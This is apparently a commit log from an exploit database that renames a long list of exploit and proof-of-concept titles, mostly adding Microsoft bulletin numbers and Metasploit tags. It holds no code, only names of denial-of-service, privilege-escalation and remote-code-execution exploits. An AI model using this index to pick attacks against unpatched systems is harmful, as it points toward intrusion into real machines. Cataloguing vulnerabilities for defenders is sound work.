Commit
14 new exploits Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Windows - 'Jolt2.c' Denial of Service Microsoft Windows - 'Jolt2.c' Denial of Service (MS00-029) Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019) Ventrilo 2.3.0 - Remote Denial of Service (All Platforms) Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1) Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1) Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2) Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2) Microsoft Windows Vista - Access Violation from Limited Account Exploit (BSoD) Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death) Microsoft Windows 2003 - '.EOT' BSOD Crash Microsoft Windows 2003 - '.EOT' Blue Screen of Death Crash Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote BSOD Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063) Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit) Microsoft Windows 2000<2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit) Google Chrome 4.1 - OOB Array Indexing Google Chrome 4.1 - Out-of-Bounds Array Indexing Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC) Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC) CommView 6.1 (Build 636) - Local Denial of Service (BSOD) CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death) Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051) Microsoft Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051) 
Microsoft Cinepak Codec CVDecompress - Heap Overflow Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055) Microsoft Unicode Scripts Processor - Remote Code Execution Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063) Microsoft Office - HtmlDlgHelper Class Memory Corruption Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071) Microsoft Plug and Play Service - Overflow Exploit (Metasploit) Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit) Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02) Microsoft HyperV - Persistent Denial of Service Microsoft HyperV - Persistent Denial of Service (MS11-047) Crush FTP 5 - 'APPE' command Remote JVM BSOD (PoC) Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC) Microsoft WINS Service 5.2.3790.4520 - Memory Corruption Microsoft WINS - ECommEndDlg Input Validation Error Microsoft WINS Service 5.2.3790.4520 - Memory Corruption (MS11-035) Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070) Win32k - Null Pointer De-reference PoC (MS11-077) Microsoft Win32k - Null Pointer De-reference PoC (MS11-077) Winows 7 keylayout - Blue Screen Microsoft Winows 7 - Keyoard Layout Blue Screen of Death (MS10-073) Apple Safari - GdiDrawStream BSoD Apple Safari - GdiDrawStream Blue Screen of Death PeerBlock 1.1 - BSOD Exploit PeerBlock 1.1 - Blue Screen of Death Exploit .NET Framework EncoderParameter - Integer Overflow Microsoft .NET Framework EncoderParameter - Integer Overflow (MS12-025) Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (Post MS12-034) Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034) Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050) Microsoft 
Windows Media Services 4.0/4.1 - Denial of Service Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038) Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2) Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (MS00-040) (2) Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070) Microsoft IIS 4.0/5.0 - FTP Denial of Service Microsoft IIS 4.0/5.0 - FTP Denial of Service (MS01-026) Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031) Microsoft Windows XP/2000 - showHelp CHM File Execution Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004) Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service Microsoft Windows 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051) Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012) DirectShow - Arbitrary Memory Overwrite (MS13-056) Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056) Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (1) Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1) Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow (MS11-083) Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads (MS15-021) Google Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow Google Chrome - open-vcdiff Out-of-Bounds Read in Browser Process Integer Overflow Avast! - OOB Write Decrypting PEncrypt Packed executables Avast! 
- Out-of-Bounds Write Decrypting PEncrypt Packed executables Microsoft Office - COM Object DLL Planting with 'WMALFXGFXDSP.dll' (MS16-007) Microsoft Office / COM Object - 'WMALFXGFXDSP.dll' DLL Planting (MS16-007) Apple Mac OSX Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type Apple Mac OSX Kernel - Out-of-Bounds Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type Microsoft Edge - 'Array.splice' Heap Overflow Moxa SoftCMS 1.5 - Denial of Service (PoC) Microsoft Edge - 'FillFromPrototypes' Type Confusion Microsoft Edge - 'Array.filter' Info Leak Microsoft Edge - 'Array.reverse' Overflow Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019) Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation (MS04-020) Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019) Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022) Microsoft Windows 2000 - Utility Manager All-in-One Exploit (MS04-019) Microsoft Windows Server 2000 - Utility Manager Privilege Elevation Exploit (MS04-019) Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020) Microsoft Windows Server 2000 - Universal Language Utility Manager Exploit (MS04-019) Microsoft Windows Server 2000/XP - Task Scheduler .job Exploit (MS04-022) Microsoft Windows Server 2000 - Utility Manager All-in-One Exploit (MS04-019) Microsoft Windows 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055) Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055) Microsoft Windows 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030) Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030) Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066) Microsoft Excel - 0x5D record 
Stack Overflow Microsoft Excel - 0x5D record Stack Overflow (MS10-038) Win32k - Keyboard Layout (MS10-073) Microsoft Win32k - Keyboard Layout (MS10-073) Adobe - Doc.media.newPlayer Use-After-Free (1) Adobe - 'util.printf()' Buffer Overflow (1) Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1) Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1) Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1) Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1) Adobe - JBIG2Decode Memory Corruption (1) Adobe - Collab.getIcon() Buffer Overflow (1) Adobe Flash Player - 'newfunction' Invalid Pointer Use (1) Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (Metasploit) Adobe - JBIG2Decode Memory Corruption (Metasploit) (1) Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (1) Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1) Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit) Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (2) Media Jukebox 8.0.400 - Buffer Overflow (SEH) Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (2) Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit) Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (2) Adobe - Doc.media.newPlayer Use-After-Free (2) Adobe - 'util.printf()' Buffer Overflow (2) Microsoft Excel - Malformed FEATHEADER Record (Metasploit) Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2) Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (2) Adobe - 'util.printf()' Buffer Overflow (Metasploit) (2) Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit) HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3) HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3) WM Downloader 3.1.2.2 - Buffer Overflow (2) WM Downloader 3.1.2.2 - Buffer Overflow (Metasploit) (2) HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (2) 
Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (2) HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2) Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2) Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2) Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2) Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (Metasploit) Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit) gAlan 0.2.1 - Buffer Overflow (2) Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (Metasploit) gAlan 0.2.1 - Buffer Overflow (Metasploit) (2) Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit) BACnet OPC Client - Buffer Overflow (2) BACnet OPC Client - Buffer Overflow (Metasploit) (2) Adobe - JBIG2Decode Memory Corruption (2) Adobe - JBIG2Decode Memory Corruption (Metasploit) (2) Mini-stream 3.0.1.1 - Buffer Overflow (2) Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2) Adobe - Collab.getIcon() Buffer Overflow (2) Adobe PDF - Escape EXE Social Engineering (No JavaScript) HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (4) Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2) Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit) HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4) Microsoft Word - RTF pFragments Stack Buffer Overflow (File Format) Adobe Flash Player - 'newfunction' Invalid Pointer Use (2) Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit) Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2) Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1) Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (1) Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (Metasploit) Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (MS10-028) (Metasploit) Microsoft Windows 7 SP1 - 'mrxdav.sys' 
WebDav Privilege Escalation (MS16-016) Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit) Microsoft Excel 2007 SP2 - Buffer Overwrite Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021) Mini-stream Ripper 3.0.1.1 - Buffer Overflow (3) Mini-stream Ripper 3.0.1.1 - Buffer Overflow (Metasploit) (3) Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021) Microsoft Excel 2007 - '.xlb' Buffer Overflow (MS11-021) (Metasploit) Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) Microsoft Excel - Malformed OBJ Record Handling Overflow (MS11-038) (Metasploit) Microsoft Office 2003 Home/Pro - Code Execution Microsoft Office 2003 Home/Pro - Code Execution (MS10-087) Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit) Microsoft Windows - Task Scheduler XML Privilege Escalation (Metasploit) Microsoft Windows - Task Scheduler .XML Privilege Escalation (MS10-092) (Metasploit) Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request Microsoft Windows NT 4.0 / 2000 - Spoofed LPC Request (MS00-003) Microsoft Windows Kernel - Intel x64 SYSRET (PoC) Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC) Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) Microsoft Windows - 'AfdJoinLeaf' Privilege Escalation (MS11-080) (Metasploit) Kerberos in Microsoft Windows - Security Feature Bypass (MS16-101) Microsoft Windows Kerberos - Security Feature Bypass (MS16-101) Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation Microsoft Windows 2000/NT 4 - Local Descriptor Table Privilege Escalation (MS04-011) Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020) Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) Microsoft Windows - 
HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit) VMware - Setuid VMware-mount Unsafe popen(3) VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit) Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (Metasploit) Microsoft Windows - TrackPopupMenuEx Win32k NULL Page (MS13-081) (Metasploit) Microsoft Word - RTF Object Confusion (MS14-017) Microsoft Word - RTF Object Confusion (MS14-017) (Metasploit) Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei) Microsoft Windows - NTUserMessageCall Win32k Kernel Pool Overflow 'schlamperei.x86.dll' (MS13-053) (Metasploit) .NET Deployment Service - IE Sandbox Escape (MS14-009) Registry Symlink - IE Sandbox Escape (MS13-097) Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit) Microsoft Registry Symlink - IE Sandbox Escape (MS13-097) (Metasploit) Microsoft Windows - OLE Package Manager Code Execution (MS14-060) Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit) Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (Metasploit) Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit) Microsoft Windows - OLE Package Manager Code Execution Through Python (MS14-064) Microsoft Windows - OLE Package Manager Code Execution (MS14-064) Microsoft Windows - OLE Package Manager Code Execution (via Python) (MS14-064) (Metasploit) Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit) Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit) Microsoft Windows Server 2003 SP2 - Privilege Escalation Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070) Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073) Publish-It - 
'.PUI' Buffer Overflow (SEH) Publish-It - '.PUI' Buffer Overflow (SEH) (Metasploit) Microsoft Windows - ClientCopyImage Win32k Exploit (Metasploit) Microsoft Windows - ClientCopyImage Win32k Exploit (MS15-051) (Metasploit) Microsoft Word - Local Machine Zone Remote Code Execution Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022) VideoCharge Studio - Buffer Overflow (SEH) VideoCharge Studio - Buffer Overflow (SEH) (Metasploit) Microsoft Windows - NtUserGetClipboardAccessToken Token Leak Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023) Microsoft Windows - Font Driver Buffer Overflow (MS15-078) Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit) Nagios 4.2.2 - Privilege Escalation ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit) Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit) VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010) VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation Palo Alto Networks PanOS root_trace - Privilege Escalation Palo Alto Networks PanOS root_reboot - Privilege Escalation RealServer < 8.0.2 - Remote Exploit (Windows Platforms) RealServer < 8.0.2 (Windows Platforms) - Remote Exploit Microsoft Windows 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026) Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026) Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049) Microsoft Windows Server 2000/XP - Workstation Service 
Overflow (MS03-049) Microsoft Windows 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011) Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011) Microsoft Windows - 'WINS' Remote Buffer Overflow (3) Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3) Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3) Microsoft Windows Message Queuing - Buffer Overflow Universal Exploit (MS05-017) (v.0.3) Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) (MS05-039) Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039) eIQnetworks License Manager - Remote Buffer Overflow (1) (Metasploit) eIQnetworks License Manager - Remote Buffer Overflow (2) (Metasploit) eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1) eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2) Microsoft Windows 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit) Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit) Broadcom Wireless Driver - Probe Response SSID Overflow (1) (Metasploit) Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1) Microsoft Windows - NetpManageIPCConnect - Stack Overflow (Python) Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python) Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033) Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033) CCProxy 6.2 - Telnet Proxy Ping Overflow (1) (Metasploit) CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) 
(1) Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065) Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065) Microsoft Windows Message Queuing Service - RPC Buffer Overflow Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) Microsoft Internet Explorer 5/6/7 - Memory Corruption (PoC) (MS09-054) Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044) Movie Maker - Remote Code Execution (MS10-016) Microsoft Movie Maker - Remote Code Execution (MS10-016) ASP.NET - Padding Oracle (MS10-070) Microsoft ASP.NET - Padding Oracle (MS10-070) ASP.NET - Padding Oracle File Download (MS10-070) Microsoft Windows - NTLM Weak Nonce Microsoft ASP.NET - Padding Oracle File Download (MS10-070) Microsoft Windows - NTLM Weak Nonce (MS10-012) ASP.NET - Auto-Decryptor File Download Exploit (MS10-070) Microsoft ASP.NET - Auto-Decryptor File Download Exploit (MS10-070) Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (loop) Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit) Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (1) PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1) PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) (Metasploit) Axis2 - Authenticated Code Execution (via REST) Axis2 - Authenticated Code Execution (via REST) (Metasploit) Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) (Metasploit) Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (Metasploit) Microsoft Private Communications Transport - Overflow Exploit (Metasploit) Microsoft Windows Media Services - 
ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit) Microsoft Private Communications Transport - Overflow Exploit (MS04-011) (Metasploit) Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (Metasploit) Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (Metasploit) Microsoft IIS - Phone Book Service Overflow (Metasploit) Microsoft IIS - ISAPI 'nsiislog.dll' ISAPI POST Overflow (MS03-022) (Metasploit) Microsoft IIS - ISAPI FrontPage 'fp30reg.dll' Chunked Overflow (MS03-051) (Metasploit) Microsoft IIS - Phone Book Service Overflow (MS00-094) (Metasploit) Microsoft WINS - Service Memory Overwrite (Metasploit) Microsoft Windows - SMB Relay Code Execution (Metasploit) Microsoft Windows - Print Spooler Service Impersonation (MS10-061) Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (Metasploit) Microsoft RRAS Service - Overflow Exploit (Metasploit) Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (Metasploit) Microsoft Server Service - NetpwPathCanonicalize Overflow (Metasploit) Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (Metasploit) Microsoft Services - 'nwwks.dll' (MS06-066) Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit) Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit) Microsoft Windows - Print Spooler Service Impersonation (MS10-061) (Metasploit) Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit) Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit) Microsoft RRAS Service - Overflow Exploit (MS06-025) (Metasploit) Microsoft DNS RPC Service - extractQuotedChar() Overflow 'SMB' (MS07-029) (Metasploit) Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit) Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit) 
Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit) Microsoft NetDDE Service - Overflow Exploit (Metasploit) Microsoft Workstation Service - NetpManageIPCConnect Overflow (Metasploit) Microsoft Services - 'nwapi32.dll' (MS06-066) Microsoft NetDDE Service - Overflow Exploit (MS04-031) (Metasploit) Microsoft Workstation Service - NetpManageIPCConnect Overflow (MS06-070) (Metasploit) Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit) Microsoft RRAS Service - RASMAN Registry Overflow (Metasploit) Microsoft RRAS Service - RASMAN Registry Overflow (MS06-025) (Metasploit) Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) Microsoft Workstation Service - NetAddAlternateComputerName Overflow (Metasploit) Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (Metasploit) Microsoft Windows - ASN.1 Library Bitstring Heap Overflow (MS04-007) (Metasploit) Microsoft Workstation Service - NetAddAlternateComputerName Overflow (MS03-049) (Metasploit) Microsoft Outlook Express - NNTP Response Parsing Buffer Overflow (MS05-030) (Metasploit) Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit) Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (2) Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (Metasploit) Microsoft SQL Server - Resolution Overflow (Metasploit) Microsoft SQL Server - Payload Execution (via SQL Injection) Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit) Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit) Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit) Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (via SQL Injection) Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit) Microsoft SQL Server - Hello Overflow (Metasploit) Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit) CA BrightStor ARCserve for Laptops & Desktops 
LGServer - Buffer Overflow (1) CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1) CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (2) CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (2) CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (3) CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (3) CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (1) CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (1) IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1) IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (1) HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1) HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1) Microsoft DirectX DirectShow - SAMI Buffer Overflow (Metasploit) Microsoft DirectX DirectShow - SAMI Buffer Overflow (MS07-064) (Metasploit) HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2) HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2) Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (Metasploit) Microsoft IIS 4.0 - '.htr' Path Overflow (Metasploit) Microsoft IIS 5.0 - Printer Host Header Overflow (Metasploit) Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (Metasploit) Microsoft IIS/PWS - CGI Filename Double Decode Command Execution (MS01-026) (Metasploit) Microsoft IIS 4.0 - '.htr' Path Overflow (MS02-018) (Metasploit) Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit) Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit) Microsoft IIS 5.0 - IDQ Path Overflow (Metasploit) Microsoft IIS 5.0 - IDQ Path Overflow (MS01-033) (Metasploit) Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (1) Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (1) Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method 
Heap Buffer Overflow (Metasploit) Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (Metasploit) Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit) Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit) Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (Metasploit) Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit) Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit) Microsoft Internet Explorer - XML Core Services HTTP Request Handling (Metasploit) Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (Metasploit) Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit) Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit) Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (Metasploit) Microsoft Office Web Components (OWC) Spreadsheet - 